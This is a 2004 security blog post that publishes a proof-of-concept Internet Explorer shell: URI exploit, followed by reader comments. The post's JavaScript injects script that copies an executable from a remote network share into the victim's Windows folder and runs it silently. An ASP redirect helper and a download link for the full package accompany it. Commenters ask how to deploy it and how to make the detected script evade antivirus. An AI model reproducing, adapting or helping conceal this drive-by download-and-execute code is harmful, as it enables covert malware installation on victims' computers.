IE Shell URI Download and Execute, POC Exploit

13.07.2004

Okuyucu : 13.980
Günlük Okuyucu : 9,5

Code is based on http://www.securityfocus.com/archive/1/367878( POC by Jelmer) message. I just added a new feature download and then execute application. Also I use Wscript.Shell in Javascript instead of Shell.Application

function injectIt() {
	document.frames[0].document.body.insertAdjacentHTML('afterBegin','injected<script language="JScript" DEFER> var rF="\\\\\\\\IPADDRESS\\\\NULLSHAREDFOLDER\\\\bad.exe"; var wF="%windir%\\\\_tmp.exe"; var o=new ActiveXObject("wscript.shell"); var e="%comspec% /c copy "+rF+" "+wF; var err=o.Run(e,0,true);if(err==0)o.Run(wF,0,false);</script>');
}
document.write('<iframe src="shell:WINDOWS\\Web\\TIP.HTM"></iframe>');
setTimeout("injectIt()", 1000);

This will copy an executable (here : bad.exe) to victim's windows directory and execute it. All progresses are completly hidden.

Also I converted redir.jsp to redir.asp

<%
Response.Expires = 1
Response.Expiresabsolute = Now() - 1
Response.AddHeader "pragma","no-cache"
Response.AddHeader "cache-control","private"
Response.CacheControl = "no-cache"
For x = 1 to 500000 'Time
   z = z + 10
Next

Response.Status = "302 Found" 
Response.AddHeader "Content-Length", "4"
Response.AddHeader "Location","URL:res://shdoclc.dll/HTTP_501.htm"
%>

Download : http://ferruh.mavituna.com/exploits/fm_ieshell.zip

Yorumlar

RSS Bu makalenin yorumlarını RSS ile takip et!

i want to test your scripts. but i don't know how to replace \\\\\\\\IPADDRESS\\\\NULLSHAREDFOLDER\\\\ .
Please advice! thanks.

How to set \\\\\\\\IPADDRESS\\\\NULLSHAREDFOLDER\\\\ ? [ # | 14.07.2004 ]

"\\\\\\\\IPADDRESS\\\\NULLSHAREDFOLDER\\\\bad.exe"
i must have a server which has NULLSHARE?Can i replace this to a file which stored on a webserver?

[ # | 14.07.2004 ]

I will test it, anyone knows a free server to test it, that support ASP?

Also, the .JS is detected, any ideas to make it undetected.?

Droopy

Nice mod [ # | 14.07.2004 ]

Hi,
I have been execute some tests related to your technique and don't have success in reproduction of this issue in my lab.
The server hosting the files is one Windows 2000 Professional with ASP support. The clients tested is a WindowsME and one Windows 2000 Professional without any new patch.
I have been test some variant codes and don't have success with these codes.
Exist some functional PoC in http://www.safecenter.net/UMBRELLAWEBV4/ie_unpatched/index.html, like the http://www.safecenter.net/UMBRELLAWEBV4/LocalZoneInCache/LocalZoneInCache-Demo/index.html. But some files can't be downloaded (like RedirGen.asp).
I am trying reproduct a IE AutoExec technique since two weeks ago, withou success!
All help is welcome.
Thanks to atention and sorry to my bad english (I am a poor brazilian guy).
Best regards.

Don't work! [ # | 15.07.2004 ]

Hi...

I want to change Windows and ASP environments into Linux and PHP...
advise to me...

Linux and PHP [ # | 15.07.2004 ]

Can redir.asp to redir.php?
Sorry.my english isn't good

[ # | 16.07.2004 ]

I cannot get this to work on 2003. I have replaced the IPADDRESS on my machine.
Anything else need changing?
thks

ahh [ # | 26.07.2004 ]

kardeş türkçe yazılmazmı bu siteye türkiyede yaşıyoruz nedir bu yabancı hastalığı anlayamadım

acemi [ # | 11.03.2005 ]

acemi kardeşim bırak bende bu siteyi gördüm adam ecnebilere ders veriyor ne güzel işte :)))))))))

mehmet ahmet [ # | 03.09.2006 ]

Yorum Ekle





Kullanılabilir Taglar : [<blockquote>] [<strong>] [<em>]

Diğer Yazılar

Neredeyim ?

Ferruh.Mavituna » Güvenlik (Security) » IE Shell URI Download and Execute, POC Exploit

RSS Feed site statistics RSS Subscribers
Siteyi E-mail ile Takip Et

Ferruh Mavituna
© 2002-2007, Ferruh Mavituna

Sabit IP Adresi : 81.22.99.133, SSL Erişimi, Hakkında